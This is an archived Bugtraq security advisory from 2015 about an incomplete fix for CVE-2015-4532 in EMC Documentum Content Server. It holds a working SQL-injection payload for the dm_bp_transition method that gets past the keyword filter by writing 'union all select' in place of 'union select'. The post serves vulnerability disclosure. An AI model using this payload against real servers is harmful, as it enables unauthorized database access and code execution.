[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

EMC Documentum Content Server: arbitrary code execution (incomplete fix in CVE-2015-4532)

To: "Bugtraq" <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: EMC Documentum Content Server: arbitrary code execution (incomplete fix in CVE-2015-4532)
From: <andrew@xxxxxxxxxxxx>
Date: Tue, 18 Aug 2015 04:25:38 +1000

Product: EMC Documentum Content Server
Vendor: EMC
Version: ANY
CVE: N/A
Risk: High
Status: public/not fixed

For detailed description see http://seclists.org/bugtraq/2015/Jul/51

New behavior introduced in CVE-2015-4532:

API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
       repo repo dmadmin "" 0000000000000000 0000000000000000
       0000000000000000 "0801fd08805c9dfe,'' union select r_object_id
       from  dm_sysobject where r_object_id=''0801fd08805c9dfe"
       0000000000000000  0000000000000000 0000000000000000 ""
       0 0 T F T T dmadmin 0000000000000000'

[DM_METHOD_E_METHOD_ARGS_INVALID]error:

"The arguments being passed to the method 'dm_bp_transition' areinvalid:

    arguments contain sql keywords which are not allowed."


New attack vector (note ALL keyword):

API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
       repo repo dmadmin "" 0000000000000000 0000000000000000
       0000000000000000 "0801fd08805c9dfe,'' union all select r_object_id
       from  dm_sysobject where r_object_id=''0801fd08805c9dfe"
       0000000000000000  0000000000000000 0000000000000000 ""
       0 0 T F T T dmadmin 0000000000000000'

__
Regards,

Andrey B. Panfilov

Follow-Ups:
- Re: EMC Documentum Content Server: arbitrary code execution (incomplete fix in CVE-2015-4532)
  - From: andrew

Prev by Date: [SECURITY] [DSA 3336-1] nss security update
Next by Date: Re: [SECURITY] [DSA 3336-1] nss security update
Previous by thread: Re: Re: [SECURITY] [DSA 3336-1] nss security update
Next by thread: Re: EMC Documentum Content Server: arbitrary code execution (incomplete fix in CVE-2015-4532)
Index(es):
- Date
- Thread